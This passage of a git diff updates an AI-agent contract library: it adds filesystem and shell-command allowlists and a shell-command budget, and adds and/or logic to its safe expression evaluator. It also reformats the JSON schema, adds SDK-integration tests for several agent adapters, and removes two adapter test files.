generate_contract_yaml( agent_name: Optional[str] = None, agent_version: Optional[str] = None, ) -> str: - """Generate a contract YAML string from execution traces.""" data = generate_contract_from_traces( source, agent_name=agent_name, agent_version=agent_version ) - return yaml.dump(data, sort_keys=False, default_flow_style=False) + return cast(str, yaml.dump(data, sort_keys=False, default_flow_style=False)) diff --git a/src/agent_contracts/loader.py 
b/src/agent_contracts/loader.py index 834162e..73c0bc9 100644 --- a/src/agent_contracts/loader.py +++ b/src/agent_contracts/loader.py @@ -20,6 +20,7 @@ EffectsDeclared, ErrorDef, FailureModel, + FilesystemAuthorization, LatencySLO, MetricDef, ObservabilityConfig, @@ -27,6 +28,7 @@ PostconditionSLO, PreconditionDef, ResourceBudgets, + ShellAuthorization, SLOConfig, SubstitutionConfig, TracesConfig, @@ -81,10 +83,25 @@ def _build_postcondition(raw: Dict[str, Any]) -> PostconditionDef: def _build_effects_authorized(raw: Dict[str, Any]) -> EffectsAuthorized: + filesystem_raw = raw.get("filesystem") + filesystem = None + if isinstance(filesystem_raw, dict): + filesystem = FilesystemAuthorization( + read=filesystem_raw.get("read", []), + write=filesystem_raw.get("write", []), + ) + + shell_raw = raw.get("shell") + shell = None + if isinstance(shell_raw, dict): + shell = ShellAuthorization(commands=shell_raw.get("commands", [])) + return EffectsAuthorized( tools=raw.get("tools", []), network=raw.get("network", []), state_writes=raw.get("state_writes", []), + filesystem=filesystem, + shell=shell, ) @@ -103,6 +120,7 @@ def _build_budgets(raw: Dict[str, Any]) -> ResourceBudgets: max_tokens=budgets.get("max_tokens"), max_tool_calls=budgets.get("max_tool_calls"), max_duration_seconds=budgets.get("max_duration_seconds"), + max_shell_commands=budgets.get("max_shell_commands"), ) @@ -148,7 +166,12 @@ def _build_observability(raw: Dict[str, Any]) -> ObservabilityConfig: ] ve_raw = raw.get("violation_events") ve = ViolationEventsConfig(**ve_raw) if isinstance(ve_raw, dict) else None - return ObservabilityConfig(traces=traces, metrics=metrics, violation_events=ve) + return ObservabilityConfig( + traces=traces, + metrics=metrics, + violation_events=ve, + run_artifact_path=raw.get("run_artifact_path"), + ) def _build_versioning(raw: Dict[str, Any]) -> VersioningConfig: @@ -211,14 +234,15 @@ def load_contract(source: Union[str, Path], *, strict: bool = True) -> Contract: contract_raw = 
data.get("contract", {}) postconditions = [_build_postcondition(p) for p in contract_raw.get("postconditions", [])] - # Tier 1 fields inputs_raw = data.get("inputs") input_schema = inputs_raw.get("schema") if isinstance(inputs_raw, dict) else None preconditions = None if isinstance(inputs_raw, dict) and "preconditions" in inputs_raw: preconditions = [ PreconditionDef( - name=p["name"], check=p["check"], description=p.get("description") + name=p["name"], + check=p["check"], + description=p.get("description"), ) for p in inputs_raw["preconditions"] ] @@ -238,7 +262,6 @@ def load_contract(source: Union[str, Path], *, strict: bool = True) -> Contract: resources_raw = data.get("resources") budgets = _build_budgets(resources_raw) if isinstance(resources_raw, dict) else None - # Tier 2 fields fm_raw = data.get("failure_model") failure_model = _build_failure_model(fm_raw) if isinstance(fm_raw, dict) else None @@ -270,5 +293,6 @@ def load_contract(source: Union[str, Path], *, strict: bool = True) -> Contract: observability=observability, versioning=versioning, slo=slo, + source_path=str(Path(source).resolve()), raw=data, ) diff --git a/src/agent_contracts/postconditions.py b/src/agent_contracts/postconditions.py index 48d4a17..2e2ef97 100644 --- a/src/agent_contracts/postconditions.py +++ b/src/agent_contracts/postconditions.py @@ -6,7 +6,8 @@ - async_monitor: queues for asynchronous evaluation Expression evaluator uses a restricted subset — NO eval() or exec(). -Supports basic comparisons, membership tests, and type checks. +Supports basic comparisons, membership tests, length checks, and simple +boolean composition with `and` / `or`. 
""" from __future__ import annotations @@ -18,7 +19,6 @@ from agent_contracts.types import PostconditionDef, PreconditionDef -# Safe operators for expression evaluation _OPERATORS = { "==": operator.eq, "!=": operator.ne, @@ -42,11 +42,6 @@ def __init__(self, postcondition: PostconditionDef, output: Any) -> None: def _resolve_path(obj: Any, path: str) -> Any: - """Resolve a dotted path like 'output.status' against an object or dict. - - Only traverses dicts by key lookup. Does not use getattr to avoid - triggering properties or descriptors on untrusted objects. - """ parts = path.split(".") current = obj for part in parts: @@ -60,7 +55,6 @@ def _resolve_path(obj: Any, path: str) -> Any: def _parse_value(token: str) -> Any: - """Parse a literal value token (string, number, bool, None, list).""" token = token.strip() if token == "None" or token == "null": return None @@ -72,7 +66,6 @@ def _parse_value(token: str) -> Any: return token[1:-1] if token.startswith("'") and token.endswith("'"): return token[1:-1] - # Try list literal: ["a", "b"] if token.startswith("[") and token.endswith("]"): inner = token[1:-1].strip() if not inner: @@ -87,11 +80,10 @@ def _parse_value(token: str) -> Any: return float(token) except ValueError: pass - return token # Treat as identifier path + return token def _split_list_items(s: str) -> List[str]: - """Split comma-separated items, respecting quoted strings.""" items: List[str] = [] current: List[str] = [] in_quote: Optional[str] = None @@ -113,65 +105,94 @@ def _split_list_items(s: str) -> List[str]: return items +def _split_logical(expr: str, operator_token: str) -> List[str]: + parts: List[str] = [] + current: List[str] = [] + depth = 0 + in_quote: Optional[str] = None + i = 0 + while i < len(expr): + ch = expr[i] + if in_quote: + current.append(ch) + if ch == in_quote: + in_quote = None + i += 1 + continue + if ch in ('"', "'"): + in_quote = ch + current.append(ch) + i += 1 + continue + if ch in "([": + depth += 1 + 
current.append(ch) + i += 1 + continue + if ch in ")]": + depth = max(0, depth - 1) + current.append(ch) + i += 1 + continue + if depth == 0 and expr.startswith(operator_token, i): + parts.append("".join(current).strip()) + current = [] + i += len(operator_token) + continue + current.append(ch) + i += 1 + if current: + parts.append("".join(current).strip()) + return parts + + def evaluate_expression(check: str, context: Dict[str, Any]) -> bool: - """Evaluate a CEL-like expression safely against a context dict. - - Supported forms: - - "output is not None" - - "output is None" - - "output.status == \"resolved\"" - - "output.status in [\"resolved\", \"escalated\"]" - - "output.status not in [\"failed\"]" - - "len(output.items) > 0" - - "output.score >= 0.8" - - "true" / "false" - - Returns True if the check passes, False otherwise. - """ check = check.strip() + or_parts = _split_logical(check, " or ") + if len(or_parts) > 1: + return any(evaluate_expression(part, context) for part in or_parts) + + and_parts = _split_logical(check, " and ") + if len(and_parts) > 1: + return all(evaluate_expression(part, context) for part in and_parts) + if check in ("true", "True"): return True if check in ("false", "False"): return False - # "X is not None" - m = re.match(r"^(\S+)\s+is\s+not\s+None$", check) - if m: - val = _resolve_path(context, m.group(1)) + match = re.match(r"^(\S+)\s+is\s+not\s+None$", check) + if match: + val = _resolve_path(context, match.group(1)) return val is not None - # "X is None" - m = re.match(r"^(\S+)\s+is\s+None$", check) - if m: - val = _resolve_path(context, m.group(1)) + match = re.match(r"^(\S+)\s+is\s+None$", check) + if match: + val = _resolve_path(context, match.group(1)) return val is None - # "X not in [...]" - m = re.match(r"^(\S+)\s+not\s+in\s+(\[.+\])$", check) - if m: - val = _resolve_path(context, m.group(1)) - allowed = _parse_value(m.group(2)) + match = re.match(r"^(\S+)\s+not\s+in\s+(\[.+\])$", check) + if match: + val = 
_resolve_path(context, match.group(1)) + allowed = _parse_value(match.group(2)) return val not in allowed - # "X in [...]" - m = re.match(r"^(\S+)\s+in\s+(\[.+\])$", check) - if m: - val = _resolve_path(context, m.group(1)) - allowed = _parse_value(m.group(2)) + match = re.match(r"^(\S+)\s+in\s+(\[.+\])$", check) + if match: + val = _resolve_path(context, match.group(1)) + allowed = _parse_value(match.group(2)) return val in allowed - # "len(X) op Y" - m = re.match(r"^len\((\S+)\)\s*(==|!=|>=?|<=?)\s*(.+)$", check) - if m: - val = _resolve_path(context, m.group(1)) + match = re.match(r"^len\((\S+)\)\s*(==|!=|>=?|<=?)\s*(.+)$", check) + if match: + val = _resolve_path(context, match.group(1)) if val is None: return False - op_fn = _OPERATORS[m.group(2)] - rhs = _parse_value(m.group(3)) + op_fn = _OPERATORS[match.group(2)] + rhs = _parse_value(match.group(3)) return bool(op_fn(len(val), rhs)) - # "X op Y" (comparison) for op_str in (">=", "<=", "!=", "==", ">", "<"): parts = check.split(op_str, 1) if len(parts) == 2: @@ -189,7 +210,6 @@ def evaluate_expression(check: str, context: Dict[str, Any]) -> bool: except TypeError: return False - # Fallback: treat as a path and check truthiness val = _resolve_path(context, check) return bool(val) @@ -219,13 +239,6 @@ def evaluate_preconditions( *, raise_on_failure: bool = True, ) -> List[PreconditionResult]: - """Evaluate all preconditions against input data. - - Preconditions use the same expression evaluator as postconditions. - Context key is 'input' instead of 'output'. - - If raise_on_failure is True, raises PreconditionError on first failure. - """ context: Dict[str, Any] = {"input": input_data} results: List[PreconditionResult] = [] @@ -255,14 +268,6 @@ def evaluate_postconditions( on_warn: Optional[Callable[[PostconditionDef, Any], None]] = None, on_async: Optional[Callable[[PostconditionDef, Any], None]] = None, ) -> List[PostconditionResult]: - """Evaluate all postconditions against an output. 
- - - sync_block: raises PostconditionError on failure - - sync_warn: calls on_warn callback on failure - - async_monitor: calls on_async callback (deferred evaluation) - - Returns list of results for all evaluated postconditions. - """ context: Dict[str, Any] = {"output": output} if extra_context: context.update(extra_context) @@ -273,21 +278,26 @@ def evaluate_postconditions( if pc.enforcement == "async_monitor": if on_async: on_async(pc, output) - results.append(PostconditionResult(postcondition=pc, passed=True, enforcement="async_monitor")) + results.append( + PostconditionResult(postcondition=pc, passed=True, enforcement="async_monitor") + ) continue - # Skip eval:judge checks — they require external LLM call if pc.check.startswith("eval:"): - results.append(PostconditionResult(postcondition=pc, passed=True, enforcement=pc.enforcement)) + results.append( + PostconditionResult(postcondition=pc, passed=True, enforcement=pc.enforcement) + ) continue passed = evaluate_expression(pc.check, context) - results.append(PostconditionResult(postcondition=pc, passed=passed, enforcement=pc.enforcement)) + results.append( + PostconditionResult(postcondition=pc, passed=passed, enforcement=pc.enforcement) + ) if not passed: if pc.enforcement == "sync_block": raise PostconditionError(pc, output) - elif pc.enforcement == "sync_warn" and on_warn: + if pc.enforcement == "sync_warn" and on_warn: on_warn(pc, output) return results diff --git a/src/agent_contracts/schemas/agent-contract.schema.json b/src/agent_contracts/schemas/agent-contract.schema.json index ef8667e..6ee5748 100644 --- a/src/agent_contracts/schemas/agent-contract.schema.json +++ b/src/agent_contracts/schemas/agent-contract.schema.json @@ -4,7 +4,11 @@ "title": "Agent Contract", "description": "YAML specification for enforceable agent behavioral contracts. 
Supports three graduated tiers: Standalone (Tier 0), Enforceable (Tier 1), and Composable (Tier 2).", "type": "object", - "required": ["agent_contract", "identity", "contract"], + "required": [ + "agent_contract", + "identity", + "contract" + ], "additionalProperties": true, "patternProperties": { "^x-": { @@ -54,7 +58,10 @@ "$defs": { "Identity": { "type": "object", - "required": ["name", "version"], + "required": [ + "name", + "version" + ], "additionalProperties": true, "properties": { "name": { @@ -73,27 +80,36 @@ }, "authors": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of agent authors or maintainers." } } }, "Contract": { "type": "object", - "required": ["postconditions"], + "required": [ + "postconditions" + ], "additionalProperties": true, "properties": { "postconditions": { "type": "array", "minItems": 1, - "items": { "$ref": "#/$defs/Postcondition" }, + "items": { + "$ref": "#/$defs/Postcondition" + }, "description": "At least one machine-checkable output guarantee. This is what makes it a contract, not a README." } } }, "Postcondition": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "additionalProperties": true, "properties": { "name": { @@ -108,13 +124,21 @@ }, "enforcement": { "type": "string", - "enum": ["sync_block", "sync_warn", "async_monitor"], + "enum": [ + "sync_block", + "sync_warn", + "async_monitor" + ], "default": "sync_warn", "description": "When and how this check runs. sync_block: fails the invocation. sync_warn: logs warning. async_monitor: evaluates asynchronously." }, "severity": { "type": "string", - "enum": ["critical", "major", "minor"], + "enum": [ + "critical", + "major", + "minor" + ], "default": "major", "description": "Impact level when this postcondition fails." 
}, @@ -155,11 +179,20 @@ "type": "array", "items": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "properties": { - "name": { "type": "string" }, - "check": { "type": "string" }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "check": { + "type": "string" + }, + "description": { + "type": "string" + } } }, "description": "Preconditions that must hold before the agent runs." @@ -190,44 +223,62 @@ }, "EffectsAuthorized": { "type": "object", - "description": "Capability scope — what the agent MAY do. Default: deny all. Composes via intersection during delegation.", + "description": "Capability scope \u2014 what the agent MAY do. Default: deny all. Composes via intersection during delegation.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of tool names or glob patterns (e.g., 'database.*'). Tools not listed are BLOCKED." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed network egress URL patterns (e.g., 'https://api.example.com/*')." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed state write scope patterns (e.g., 'tickets.*', 'user.preferences')." + }, + "filesystem": { + "$ref": "#/$defs/FilesystemAuthorization" + }, + "shell": { + "$ref": "#/$defs/ShellAuthorization" } } }, "EffectsDeclared": { "type": "object", - "description": "Effect footprint — what side effects actually occur. Composes via union for auditing. Runtime enforces declared ⊆ authorized.", + "description": "Effect footprint \u2014 what side effects actually occur. Composes via union for auditing. 
Runtime enforces declared \u2286 authorized.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Tools that this agent actually invokes." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Network endpoints this agent actually contacts." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "State scopes this agent actually modifies." } } @@ -260,6 +311,11 @@ "type": "number", "exclusiveMinimum": 0, "description": "Maximum wall-clock time in seconds per invocation." + }, + "max_shell_commands": { + "type": "integer", + "exclusiveMinimum": 0, + "description": "Maximum number of shell commands per invocation." } } } @@ -274,7 +330,9 @@ "type": "array", "items": { "type": "object", - "required": ["name"], + "required": [ + "name" + ], "additionalProperties": true, "properties": { "name": { @@ -346,7 +404,9 @@ }, "allowed_agents": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of agent names that can be delegated to." 
} } @@ -359,32 +419,64 @@ "traces": { "type": "object", "properties": { - "enabled": { "type": "boolean", "default": true }, - "sample_rate": { "type": "number", "minimum": 0, "maximum": 1 } + "enabled": { + "type": "boolean", + "default": true + }, + "sample_rate": { + "type": "number", + "minimum": 0, + "maximum": 1 + } } }, "metrics": { "type": "array", "items": { "type": "object", - "required": ["name", "type"], + "required": [ + "name", + "type" + ], "properties": { - "name": { "type": "string" }, - "type": { "type": "string", "enum": ["counter", "histogram", "gauge"] }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "type": { + "type": "string", + "enum": [ + "counter", + "histogram", + "gauge" + ] + }, + "description": { + "type": "string" + } } } }, "violation_events": { "type": "object", "properties": { - "emit": { "type": "boolean", "default": true }, + "emit": { + "type": "boolean", + "default": true + }, "destination": { "type": "string", - "enum": ["stdout", "otel", "callback"], + "enum": [ + "stdout", + "otel", + "callback" + ], "default": "stdout" } } + }, + "run_artifact_path": { + "type": "string", + "description": "Repo-local verdict artifact path template. Supports {run_id}." } } }, @@ -399,7 +491,9 @@ }, "breaking_changes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of breaking changes from the previous version." }, "substitution": { @@ -407,7 +501,9 @@ "properties": { "compatible_with": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Versions this agent can substitute for (Liskov-style)." 
} } @@ -422,22 +518,36 @@ "contract_satisfaction_rate": { "type": "object", "properties": { - "target": { "type": "number", "minimum": 0, "maximum": 1 }, - "window": { "type": "string" } + "target": { + "type": "number", + "minimum": 0, + "maximum": 1 + }, + "window": { + "type": "string" + } } }, "latency": { "type": "object", "properties": { - "p50_ms": { "type": "number" }, - "p99_ms": { "type": "number" } + "p50_ms": { + "type": "number" + }, + "p99_ms": { + "type": "number" + } } }, "cost": { "type": "object", "properties": { - "avg_usd": { "type": "number" }, - "p99_usd": { "type": "number" } + "avg_usd": { + "type": "number" + }, + "p99_usd": { + "type": "number" + } } }, "error_budget_policy": { @@ -445,6 +555,39 @@ "description": "Action when error budget is exhausted (e.g., 'freeze_deployments', 'alert_only')." } } + }, + "FilesystemAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "read": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local read allowlist globs for coding/build agents." + }, + "write": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Repo-local write allowlist globs for coding/build agents." + } + } + }, + "ShellAuthorization": { + "type": "object", + "additionalProperties": true, + "properties": { + "commands": { + "type": "array", + "items": { + "type": "string" + }, + "description": "Allowed shell command patterns (glob-style matching on normalized command strings)." 
+ } + } } } } diff --git a/src/agent_contracts/types.py b/src/agent_contracts/types.py index 5120ead..5b35b1d 100644 --- a/src/agent_contracts/types.py +++ b/src/agent_contracts/types.py @@ -45,6 +45,21 @@ class PostconditionDef: # --- Tier 1: Enforceable --- +@dataclass(frozen=True) +class FilesystemAuthorization: + """Authorized repo-local filesystem scopes for coding/build agents.""" + + read: List[str] = field(default_factory=list) + write: List[str] = field(default_factory=list) + + +@dataclass(frozen=True) +class ShellAuthorization: + """Authorized shell command patterns for coding/build agents.""" + + commands: List[str] = field(default_factory=list) + + @dataclass(frozen=True) class EffectsAuthorized: """Capability scope — what the agent MAY do (default: deny all). @@ -55,6 +70,8 @@ class EffectsAuthorized: tools: List[str] = field(default_factory=list) network: List[str] = field(default_factory=list) state_writes: List[str] = field(default_factory=list) + filesystem: Optional[FilesystemAuthorization] = None + shell: Optional[ShellAuthorization] = None @dataclass(frozen=True) @@ -65,6 +82,7 @@ class ResourceBudgets: max_tokens: Optional[int] = None max_tool_calls: Optional[int] = None max_duration_seconds: Optional[float] = None + max_shell_commands: Optional[int] = None @dataclass(frozen=True) @@ -161,6 +179,7 @@ class ObservabilityConfig: traces: Optional[TracesConfig] = None metrics: List[MetricDef] = field(default_factory=list) violation_events: Optional[ViolationEventsConfig] = None + run_artifact_path: Optional[str] = None @dataclass(frozen=True) @@ -243,5 +262,8 @@ class Contract: versioning: Optional[VersioningConfig] = None slo: Optional[SLOConfig] = None + # Runtime metadata + source_path: Optional[str] = field(default=None, repr=False) + # Raw data (preserves x- extensions and unknown fields) raw: Optional[Dict[str, Any]] = field(default=None, repr=False) diff --git a/tests/conftest.py b/tests/conftest.py index 4490c09..cf84610 100644 --- 
a/tests/conftest.py +++ b/tests/conftest.py @@ -14,16 +14,13 @@ def tmp_yaml(tmp_path: Path): """Factory fixture — write a dict as YAML and return the path.""" def _write(data: Dict[str, Any], name: str = "contract.yaml") -> Path: - p = tmp_path / name - p.write_text(yaml.dump(data, sort_keys=False), encoding="utf-8") - return p + path = tmp_path / name + path.write_text(yaml.dump(data, sort_keys=False), encoding="utf-8") + return path return _write -# ---- Canonical contract data for each tier ---- - - @pytest.fixture def tier0_data() -> Dict[str, Any]: """Minimal Tier 0 contract (4 fields).""" @@ -40,7 +37,7 @@ def tier0_data() -> Dict[str, Any]: @pytest.fixture def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: - """Tier 1 contract with schemas, effects, and budgets.""" + """Tier 1 contract with coding/build authorization surfaces.""" return { **tier0_data, "inputs": {"schema": {"type": "object", "properties": {"query": {"type": "string"}}}}, @@ -50,6 +47,11 @@ def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: "tools": ["search", "database.read"], "network": ["https://api.example.com/*"], "state_writes": [], + "filesystem": { + "read": ["src/**", "tests/**", "README.md"], + "write": ["src/**", "tests/**"], + }, + "shell": {"commands": ["python -m pytest *", "python -m ruff check *"]}, } }, "resources": { @@ -58,6 +60,7 @@ def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: "max_tokens": 10000, "max_tool_calls": 20, "max_duration_seconds": 30.0, + "max_shell_commands": 5, } }, } @@ -65,7 +68,7 @@ def tier1_data(tier0_data: Dict[str, Any]) -> Dict[str, Any]: @pytest.fixture def tier2_data(tier1_data: Dict[str, Any]) -> Dict[str, Any]: - """Tier 2 contract with all composable fields.""" + """Tier 2 contract with composable fields and verdict artifact path.""" return { **tier1_data, "effects": { @@ -97,6 +100,7 @@ def tier2_data(tier1_data: Dict[str, Any]) -> Dict[str, Any]: {"name": "latency_ms", "type": "histogram"}, ], 
"violation_events": {"emit": True, "destination": "otel"}, + "run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json", }, "versioning": { "build_id": "sha256:abc123", diff --git a/tests/test_adapters/test_claude_agent.py b/tests/test_adapters/test_claude_agent.py index 43e5b71..a90110c 100644 --- a/tests/test_adapters/test_claude_agent.py +++ b/tests/test_adapters/test_claude_agent.py @@ -113,3 +113,26 @@ def test_violations_accumulated(self, hooks) -> None: "tool_input": {}, })) assert len(hooks.violations) == 1 + + +class TestRealSDKIntegration: + """Verifies the hooks dict produced by the adapter is consumable by the + real claude-agent-sdk. Skipped if claude-agent-sdk is not installed + (it requires Python 3.10+).""" + + def test_hooks_config_accepted_by_sdk(self, hooks) -> None: + sdk = pytest.importorskip("claude_agent_sdk") + config = hooks.get_hooks_config() + # Real SDK exposes ClaudeAgentOptions and accepts a hooks mapping. + options = sdk.ClaudeAgentOptions(hooks=config) + assert options.hooks is config + + def test_pre_tool_use_signature_matches_hookcallback(self) -> None: + sdk = pytest.importorskip("claude_agent_sdk") + # Adapter callbacks must accept (input_data, tool_use_id, context). 
+ assert hasattr(sdk, "HookCallback") + import inspect + sig = inspect.signature(ContractHooks.pre_tool_use) + params = list(sig.parameters) + # self + 3 hook params + assert params[1:] == ["input_data", "tool_use_id", "context"] diff --git a/tests/test_adapters/test_crewai.py b/tests/test_adapters/test_crewai.py deleted file mode 100644 index 07ecc86..0000000 --- a/tests/test_adapters/test_crewai.py +++ /dev/null @@ -1,76 +0,0 @@ -"""Tests for CrewAI adapter.""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Dict -from unittest.mock import MagicMock - -import pytest -import yaml - -from agent_contracts.adapters.crewai import ContractGuard -from agent_contracts.enforcer import ContractViolation - - -@pytest.fixture -def guard(tmp_path: Path, tier1_data: Dict[str, Any]) -> ContractGuard: - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - return ContractGuard.from_file(p, violation_destination="callback", - violation_callback=lambda e: None) - - -class TestContractGuard: - def test_from_file(self, guard) -> None: - assert guard.enforcer is not None - - def test_validate_inputs(self, guard) -> None: - errors = guard.validate_inputs({"query": "hello"}) - assert errors == [] - - def test_check_authorized_tool(self, guard) -> None: - guard.check_tool("search") - - def test_check_unauthorized_tool(self, guard) -> None: - with pytest.raises(ContractViolation): - guard.check_tool("evil_tool") - - def test_execute_crew(self, guard) -> None: - mock_crew = MagicMock() - mock_crew.kickoff.return_value = "result" - result = guard.execute(mock_crew, inputs={"query": "test"}) - assert result == "result" - mock_crew.kickoff.assert_called_once() - - def test_execute_with_invalid_input(self, tmp_path, tier1_data) -> None: - tier1_data["inputs"]["schema"]["required"] = ["query"] - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - 
guard = ContractGuard.from_file(p, violation_destination="callback", - violation_callback=lambda e: None) - mock_crew = MagicMock() - with pytest.raises(ContractViolation, match="Input validation"): - guard.execute(mock_crew, inputs={"wrong_field": "test"}) - - def test_wrap_tool(self, guard) -> None: - def my_tool(x: int) -> int: - return x * 2 - - wrapped = guard.wrap_tool(my_tool, "search") - assert wrapped(5) == 10 - - def test_wrap_unauthorized_tool(self, guard) -> None: - def my_tool() -> str: - return "result" - - wrapped = guard.wrap_tool(my_tool, "unauthorized_tool") - with pytest.raises(ContractViolation): - wrapped() - - def test_violations_tracked(self, guard) -> None: - try: - guard.check_tool("bad") - except ContractViolation: - pass - assert len(guard.violations) == 1 diff --git a/tests/test_adapters/test_langchain.py b/tests/test_adapters/test_langchain.py index 7c0b25a..164241e 100644 --- a/tests/test_adapters/test_langchain.py +++ b/tests/test_adapters/test_langchain.py @@ -61,3 +61,18 @@ def test_chain_end_postconditions(self, handler) -> None: def test_on_tool_end(self, handler) -> None: handler.on_tool_end("result") # No-op, should not raise + + +class TestRealSDKIntegration: + """Verifies the adapter is a real subclass of the installed + langchain-core BaseCallbackHandler. 
Skipped if langchain-core absent.""" + + def test_subclass_of_real_base_callback_handler(self, handler) -> None: + callbacks = pytest.importorskip("langchain_core.callbacks") + assert isinstance(handler, callbacks.BaseCallbackHandler) + + def test_hook_method_signatures_present(self) -> None: + callbacks = pytest.importorskip("langchain_core.callbacks") + for name in ("on_tool_start", "on_tool_end", "on_chain_end", "on_llm_end"): + assert hasattr(callbacks.BaseCallbackHandler, name), f"SDK missing {name}" + assert hasattr(ContractCallbackHandler, name), f"adapter missing {name}" diff --git a/tests/test_adapters/test_openai_agents.py b/tests/test_adapters/test_openai_agents.py index 3bc88f4..6918f9f 100644 --- a/tests/test_adapters/test_openai_agents.py +++ b/tests/test_adapters/test_openai_agents.py @@ -101,3 +101,32 @@ def test_on_handoff(self, hooks) -> None: def test_on_llm_start(self, hooks) -> None: run_async(hooks.on_llm_start(None, None, None, None)) + + +class TestRealSDKIntegration: + """Verifies the adapter is a real subclass of the installed SDK's + RunHooks base class. Skipped if openai-agents is not installed.""" + + def test_subclass_of_real_runhooks(self, hooks) -> None: + # agents.RunHooks is a parameterized generic alias + # (RunHooksBase[TContext, Agent]); the actual base class lives in + # agents.lifecycle and is what the adapter must subclass. 
+ pytest.importorskip("agents") + from agents.lifecycle import RunHooksBase + assert issubclass(ContractRunHooks, RunHooksBase) + assert isinstance(hooks, RunHooksBase) + + def test_hook_method_signatures_present(self) -> None: + pytest.importorskip("agents") + from agents.lifecycle import RunHooksBase + for name in ( + "on_tool_start", + "on_tool_end", + "on_llm_start", + "on_llm_end", + "on_agent_start", + "on_agent_end", + "on_handoff", + ): + assert hasattr(RunHooksBase, name), f"SDK is missing {name}" + assert hasattr(ContractRunHooks, name), f"adapter is missing {name}" diff --git a/tests/test_adapters/test_pydantic_ai.py b/tests/test_adapters/test_pydantic_ai.py deleted file mode 100644 index 3972a62..0000000 --- a/tests/test_adapters/test_pydantic_ai.py +++ /dev/null @@ -1,58 +0,0 @@ -"""Tests for Pydantic AI adapter.""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Dict - -import pytest -import yaml - -from agent_contracts.adapters.pydantic_ai import ContractMiddleware -from agent_contracts.enforcer import ContractViolation - - -@pytest.fixture -def middleware(tmp_path: Path, tier1_data: Dict[str, Any]) -> ContractMiddleware: - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - return ContractMiddleware.from_file(p, violation_destination="callback", - violation_callback=lambda e: None) - - -class TestContractMiddleware: - def test_from_file(self, middleware) -> None: - assert middleware.enforcer is not None - - def test_check_authorized_tool(self, middleware) -> None: - middleware.check_tool("search") - - def test_check_unauthorized_tool(self, middleware) -> None: - with pytest.raises(ContractViolation): - middleware.check_tool("evil_tool") - - def test_validate_result(self, middleware) -> None: - errors = middleware.validate_result({"result": "ok"}) - assert errors == [] - - def test_wrap_tool(self, middleware) -> None: - def search(q: str) -> str: - return 
f"found: {q}" - - wrapped = middleware.wrap_tool(search, "search") - assert wrapped("test") == "found: test" - - def test_wrap_unauthorized_tool(self, middleware) -> None: - def bad_tool() -> str: - return "nope" - - wrapped = middleware.wrap_tool(bad_tool, "unauthorized") - with pytest.raises(ContractViolation): - wrapped() - - def test_violations_tracked(self, middleware) -> None: - try: - middleware.check_tool("bad") - except ContractViolation: - pass - assert len(middleware.violations) == 1 diff --git a/tests/test_budgets.py b/tests/test_budgets.py index 2b20d43..0492e2a 100644 --- a/tests/test_budgets.py +++ b/tests/test_budgets.py @@ -3,6 +3,7 @@ from __future__ import annotations import threading +import time import pytest @@ -18,52 +19,54 @@ def test_no_config_allows_all(self) -> None: tracker.add_tokens(1_000_000) for _ in range(1000): tracker.record_tool_call() - tracker.check_all() # Should not raise + tracker.record_shell_command() + tracker.check_all() def test_cost_limit(self) -> None: - budgets = ResourceBudgets(max_cost_usd=1.00) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_cost_usd=1.00)) tracker.add_cost(0.50) tracker.add_cost(0.40) with pytest.raises(BudgetExceededError, match="cost_usd"): tracker.add_cost(0.20) def test_token_limit(self) -> None: - budgets = ResourceBudgets(max_tokens=1000) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tokens=1000)) tracker.add_tokens(800) with pytest.raises(BudgetExceededError, match="tokens"): tracker.add_tokens(300) def test_tool_call_limit(self) -> None: - budgets = ResourceBudgets(max_tool_calls=3) - tracker = BudgetTracker(budgets) + tracker = BudgetTracker(ResourceBudgets(max_tool_calls=3)) tracker.record_tool_call() tracker.record_tool_call() tracker.record_tool_call() with pytest.raises(BudgetExceededError, match="tool_calls"): tracker.record_tool_call() - def test_duration_limit(self) -> None: - budgets = 
